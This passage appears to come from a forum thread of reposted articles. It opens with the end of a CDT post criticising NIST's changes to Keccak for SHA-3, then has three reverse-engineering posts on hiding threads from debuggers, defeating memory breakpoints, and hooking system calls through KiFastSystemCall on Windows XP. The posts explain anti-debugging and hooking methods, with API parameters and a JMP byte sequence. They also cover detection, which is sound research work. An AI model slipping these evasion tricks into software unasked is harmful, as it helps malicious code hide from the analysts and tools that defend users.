384, 512-bit security levels) and add in a much weaker but high-performance 128-bit version for those users who want to make that trade-off. 
This would be the “Kumbaya” solution, as it would have five security levels with both the NIST-modified versions and the as-submitted Keccak versions. Justify optimizations and internal changes: NIST has obviously made significant internal changes to the Keccak algorithm. This means that the NIST-modified Keccak and the winner of the SHA-3 competition are likely to be very different. To be sure, there are probably some very good reasons for the changes, but we don’t know what they are, and it would be unfortunate to learn them simply in the draft standard as published in October. Extensive changes should technically be subject to the cryptanalysis that was brought to bear during the actual competition. Unfortunately, it will be impossible to muster the cryptographic scrutiny necessary to examine the NIST-modified Keccak as the resources and teams that worked on this during the competition are no longer available. Here, it makes sense for NIST to standardize both the winning version of Keccak and NIST’s optimized version (“SHA-3-Opt” maybe?), so that implementers can have their pick of whether they want the Keccak that was subject to the grueling competition or an improved version that hasn’t been subject to as much scrutiny. Improve the standardization process: No one doubts that NIST runs high-quality cryptographic competitions. The many-year competitions that resulted in AES (the Advanced Encryption Standard) and SHA-3 marshaled the most gifted cryptographic thinkers in the world to shake down very exotic forms of mathematics to result in very strong, clever and useful practical outcomes. The resulting algorithms look indistinguishable from magic to many of us who are not steeped in the fine art of cryptography. However, the process of getting from the algorithm that won the competition to a standard is a dark and mysterious process, and it need not be. 
While the relationship between NSA and NIST has always made many of us uneasy, in light of recent revelations, it’s especially important that this standardization step be open and transparent with a formal process that works to ensure that all decisions are made in a well-documented manner and that conditions that ensured an algorithm withstood withering scrutiny during a competition do not subsequently change dramatically during the standardization process. At CDT, we work hard to make sure that standards processes serve the public interest in an open, free and innovative Internet. We’ll be advocating for changes in standards processes at NIST so that it remains an unbiased, trusted, and scientific venue for developing cybersecurity and cryptographic standards. UPDATE [2013-09-24T17:41:24]: Changed title to better reflect that SHA-3 is not an encryption standard but a hash function standard (without using "hash function" in the title). Better qualified that SHA-1 is likely weak in the face of government-level adversaries. Further update [2013-09-25T06:09:38]: clarified that SHA-1 is essentially on its way out. Sursa: https://www.cdt.org/blogs/joseph-lorenzo-hall/2409-nist-sha-3
  23. [h=3]Hiding Threads From Debuggers[/h]In this post I will take into discussion an old anti-debug trick that many of us know well. The trick is the ability of our code to hide specific threads from debuggers. This is usually achieved by calling the ntdll "ZwSetInformationThread" function with the "ThreadInformationClass" parameter set to ThreadHideFromDebugger 0x11. Sample code for this trick can be found here. If we take the "ZwSetInformationThread" function into disassembly, we can easily see that the "ThreadInformationLength" parameter must be zero for the function call to succeed, otherwise ERROR_BAD_LENGTH is returned. See image below. And here is the 64-bit version. As you can see from the two images above, the whole function call ends up setting the "HideFromDebugger" bit of the "_ETHREAD" structure. Once this flag has been set, the kernel guarantees that the debugger will never receive any debug events from the corresponding thread. For example, let's take the LOAD_DLL_DEBUG_EVENT events. As you know, any time a module is loaded into the address space of a specific process, the debugger is notified of this action through the LOAD_DLL_DEBUG_EVENT events. The debugger then inspects various interesting fields in the "LOAD_DLL_DEBUG_INFO" structure, e.g. ImageBase. Depending on the debugger configuration, the debugger notifies you of that or not. You can see this if you instruct OllyDbg to break on new module. The two images above show how OllyDbg acts if a normal (not hidden) thread loads a new DLL. It is as follows: 1) The thread loads a new DLL via calling e.g. the "LoadLibrary" function. 2) The "LoadLibrary" function wraps up a call to the ntdll "ZwMapViewOfSection" function. 3) The kernel-mode part of ZwMapViewOfSection calls the "DbgkMapViewOfSection" function. 4) The "DbgkMapViewOfSection" function queries both the "HideFromDebugger" bit of the "_ETHREAD" structure and the value of the "DebugPort" field of the "_EPROCESS" structure. 
If the "HideFromDebugger" bit is not set and the "DebugPort" field is set, then the function builds the "LOAD_DLL_DEBUG_INFO" structure and calls the "DbgkpSendApiMessage" function, which is responsible for delivering the debug event to the attached debugger. On the other side, if the "HideFromDebugger" bit is set, DbgkMapViewOfSection returns immediately without delivering the debug event. See images below. N.B. Regarding the UN/LOAD_DLL_DEBUG_EVENT's, there are other factors that determine whether or not the debug event is going to be delivered to the debugger, e.g. the "SuppressDebugMsg" bit of the Thread Environment Block (TEB). 5) In the debugger, the "WaitForDebugEvent" function returns with the "dwDebugEventCode" field set to LOAD_DLL_DEBUG_EVENT 0x6. Given this, the debugger figures out that a new module has just been loaded and that it should inspect the "LOAD_DLL_DEBUG_INFO" structure to extract the new image base, file handle, etc. 6) After extracting info from the "LOAD_DLL_DEBUG_INFO" structure, the debugger calls the "ContinueDebugEvent" function to continue executing the thread. Similar to LOAD_DLL_DEBUG_EVENT's, debuggers never get notified of exceptions raised in the scope of hidden threads. To ensure that, let's have a look at the "DbgkForwardException" function. As you can see in the image above, the "HideFromDebugger" bit of the "_ETHREAD" structure is queried here as well. Conclusion: When the "HideFromDebugger" bit flag of the "_ETHREAD" structure is set, the thread will not receive any debug events. If we look again at the "NtSetInformationThread" function in disassembly, we will see that the function call is one-way, i.e. you can make this call to hide the thread from debuggers but you cannot make it to un-hide the thread. Let's have a look at the "ZwQueryInformationThread" function. As the name implies, we can use this function to determine if a specific thread is hidden from debuggers. See below. 
And here is the 64-bit version. As you can see from the two images above, the "ThreadInformationLength" parameter must be one for this function call to succeed. If it is one as expected, nothing surprising is seen; the function just sets the first byte pointed to by the "ThreadInformation" parameter to one if the "HideFromDebugger" bit of the "_ETHREAD" structure is set. Given this knowledge, I have created a small OllyDbg v1.10 plugin to detect any hidden thread in the process being debugged, esp. if we are attaching to an active process. The plugin is called HiddenThreads. You can download it from here and its source code from here. Unfortunately, in older versions of Windows, e.g. XP, the "ZwQueryInformationThread" function can't be used to detect if a thread is hidden from debuggers, as the ThreadHideFromDebugger information class 0x11 is simply not implemented; the function call returns ERROR_INVALID_PARAMETER. Now that we have seen how to hide a thread from debuggers, how this works under the hood, and how to detect if a thread is hidden from debuggers, let's try to find another way to hide the thread other than calling the "ZwSetInformationThread" function. With the introduction of the "ZwCreateThreadEx" function, e.g. in Windows Vista and 7, a new flags parameter is present. If we set this parameter (the 7th parameter) to 0x4, then the new thread will be created hidden from debuggers, i.e. you don't need to call the "ZwSetInformationThread" function at all. In this case, setting the "HideFromDebugger" bit occurs in the "PspAllocateThread" function. See image below. You can find a demo here and its source code from here. This post was written based on debugging sessions on Windows 7 64-bit. This is why you see me switching from x86 to x64. Any comments or ideas are very welcome. You can follow me on Twitter @waleedassar Sursa: waliedassar: Hidding Threads From Debuggers
  24. [h=3]Defeating Memory Breakpoints[/h]In this post I will show you a couple of tricks that can be used to defeat memory breakpoints. First I should explain what memory breakpoints are and how they work. Anyone who has spent some time in the field of software protection and debuggers must have heard of memory breakpoints. Actually, memory breakpoints were not extensively used in the past, but since more and more protection schemes implement anti-INT3 and anti-hardware-breakpoint tricks, reverse engineers started to use memory breakpoints to avoid detection. The idea of memory breakpoints is so simple. Imagine that we want to place a memory breakpoint at address 0x402005 (On-Execution); what the debugger theoretically does is as follows: 1) Marks the memory page which the address 0x402005 belongs to (page 0x402000) as guarded via calling the "VirtualProtectEx" or "ZwProtectVirtualMemory" function with the "flNewProtect" parameter having the "PAGE_GUARD" protection attribute set. In this case page 0x402000 is originally PAGE_EXECUTE_READ 0x20 and after placing the memory breakpoint it becomes PAGE_EXECUTE_READ|PAGE_GUARD 0x120. 2) Each time the guarded page is touched, whether read from, written to, or executed, an exception STATUS_GUARD_PAGE_VIOLATION 0x80000001 is raised and the debugger receives a debug event of type EXCEPTION_DEBUG_EVENT. 3) The debugger then inspects various fields in the "EXCEPTION_RECORD" structure of the "DEBUG_EVENT" structure to determine the reason why the exception was raised. If the following conditions are met, then the debugger figures out that the instruction at 0x402005 is about to execute, i.e. the breakpoint is reached, and that it should break accordingly: a) The "ExceptionCode" field is set to STATUS_GUARD_PAGE_VIOLATION 0x80000001. b) The "NumberParameters" field is greater than or equal to 2. c) The "ExceptionInformation[0]" field is set to 8. d) The "ExceptionInformation[1]" field is set to 0x402005. 
The image below represents something very similar. If any of the above-mentioned conditions is not met, then the debugger figures out it is not the breakpoint. Whether the breakpoint is hit or not, the debugger resets the "PAGE_GUARD" protection attribute. Surprisingly, even though this is the typical way debuggers should implement memory breakpoints, OllyDbg and many other user-mode debuggers implement memory breakpoints in a slightly different way. Let's first take OllyDbg v1.10 and see how it implements memory breakpoints. If you use OllyDbg v1.10, you should already know that it has only two kinds of memory breakpoints, On-Access and On-Write. On-Access memory breakpoints trigger any time the page is touched and On-Write memory breakpoints trigger any time the page is written to. Trying to reverse OllyDbg v1.10 to see how it implements each type, I found out that: 1) On-Access memory breakpoints are implemented by marking the page that the breakpoint address belongs to as PAGE_NOACCESS. PAGE_NOACCESS means that any time the page is touched, an exception STATUS_ACCESS_VIOLATION is raised. The debugger then receives the debug event and inspects fields in the "EXCEPTION_RECORD" structure in a similar way to the conventional method mentioned above. 2) On-Write memory breakpoints are implemented by depriving the page which the breakpoint address belongs to of the write access right, via setting the "flNewProtect" parameter passed to the "VirtualProtectEx" function to PAGE_EXECUTE_READ. Every time the page is written to, an exception STATUS_ACCESS_VIOLATION is raised. The debugger then receives the debug event and inspects fields in the "EXCEPTION_RECORD" structure in a similar way to the conventional method mentioned above. 
Here lies a bug in OllyDbg v1.10, since it assumes that the memory protection of any single page in the process address space can be turned into PAGE_EXECUTE_READ, while this is not true; for example, the memory page at 0x10000 can never be executable (Windows 7). After we have seen how memory breakpoints are implemented, I will show you two tricks that can be used as anti-memory-breakpoints. Trick 1) Given the knowledge above, we can conclude that in order to defeat memory breakpoints, esp. those of type On-Execution, we should cause the "VirtualProtectEx" function to fail. How is that possible? By copying our code to a dynamically-allocated memory page whose page protection attributes can be executable and at the same time cannot be guarded or no-access. This type of memory page does really exist. For every thread you create, the kernel allocates one page (three pages in the case of Wow64 processes) for the TEB. The TEB page(s) can't be non-writable and can't be assigned the "PAGE_GUARD" protection attribute. How can this be implemented? All you have to do to implement this trick is call the "CreateThread" function with the "dwCreationFlags" parameter set to CREATE_SUSPENDED. At this point, we have the new thread's TEB with the page protection attributes set to PAGE_READWRITE. The next thing we should do is make the TEB page executable by calling the "VirtualProtect" function with the "flNewProtect" parameter set to PAGE_EXECUTE_READWRITE. You can use this demo to test this trick. N.B. For a more stealthy way to conceal the point at which the page protection is changed to executable, use the "VirtualAlloc" function instead of "VirtualProtect". The allocation type in this case must be MEM_COMMIT only. Trick 2) This trick can easily detect memory breakpoints. It relies on the fact that the "ReadProcessMemory" function returns false if you try to read guarded or no-access memory. 
To use this trick, all you have to do is call the "ReadProcessMemory" function with the "Handle" parameter set to 0xFFFFFFFF (the current-process pseudo-handle), the "lpBaseAddress" parameter set to the image base, and the "nSize" parameter set to the size of the image. If it returns false, then at least one memory breakpoint is present. You can use this demo to test this trick. N.B. Certain executables have inaccessible gap pages, e.g. those pages intended for anti-dumping described in a previous post, so you have to take care of that if implementing this trick. N.B. ReadProcessMemory has also been used as a stealthy way to read memory without triggering hardware breakpoints. Any comments or ideas are very welcome. You can follow me on Twitter @waleedassar Sursa: waliedassar: Defeating Memory Breakpoints
  25. [h=3]Native x86 User-mode System Calls Hooking[/h] In this post I am going to explain how to implement system call hooking from user mode for native x86 processes (here I refer to 32-bit processes running in 32-bit versions of Windows XP SP2 and SP3). Let's have a look at the "ZwOpenProcess" function of Windows XP SP2 and of Windows XP SP3. 1) XP SP2 2) XP SP3 As you can see in the images above, EAX is set to 0x7A, the system call ordinal, and EDX is made to point at 0x7FFE0300 in the _KUSER_SHARED_DATA page. Then comes a CALL instruction which jumps to the "KiFastSystemCall" function, whose address is stored at 0x7FFE0300 (_KUSER_SHARED_DATA::SystemCall). One difference we can see is that the SYSENTER of XP SP2 is followed by 5 NOPs, while in XP SP3 SYSENTER is directly followed by the RET of the "KiFastSystemCallRet" function. The first thing one may think of to implement the user-mode system call hook in Windows XP SP3/SP2 is to overwrite the "_KUSER_SHARED_DATA::SystemCall" and "_KUSER_SHARED_DATA::SystemCallRet" fields. Unfortunately, this is not possible since the page is not writable and any attempt to change its memory protection always fails. So, we should now turn to the "KiFastSystemCall" function and try to overwrite its very first instruction with a JMP instruction. Is this all? Let's see. For XP SP2, it is okay to write a near JMP instruction (5 bytes long) since we have enough space (filled with 5 NOPs) and this does not hurt the RET instruction of the "KiFastSystemCallRet" function. But for XP SP3, any attempt to write the near JMP instruction will hurt the "KiFastSystemCallRet" function. Is there any method common to both XP SP2 and SP3? I thought about that and came up with something that worked for both service packs: we allocate a memory page at an address which, when converted from absolute to relative, gives 0xC3 as the fifth byte of the new JMP instruction. 
For example, if we allocate a memory page at 0x3F910000, given that the "KiFastSystemCall" function is at 0x7C90E510, we get the new JMP instruction as a sequence of "\xE9\xEB\x1A\x00\xC3". You can check the source code of InjectHookLib for more information. N.B. We can still use a short JMP by searching for any vacant 5 bytes in the range of -128 to +127 from the address of the "KiFastSystemCall" function. LEA ESP,[ESP] seems to be okay for both service packs. N.B. With certain processors or under certain conditions e.g. disabled VT-x/AMD-V if using VirtualBox, the "KiFastSystemCall" function is not used at all and the "KiIntSystemCall" is used instead. In these cases, you can safely overwrite the first instructions of "KiIntSystemCall" function with a near JMP instruction as long as the code you hook to takes care of that. Any ideas or suggestions are always very welcome. You can follow me @waleedassar Posted by waliedassar Sursa: waliedassar: Native x86 User-mode System Calls Hooking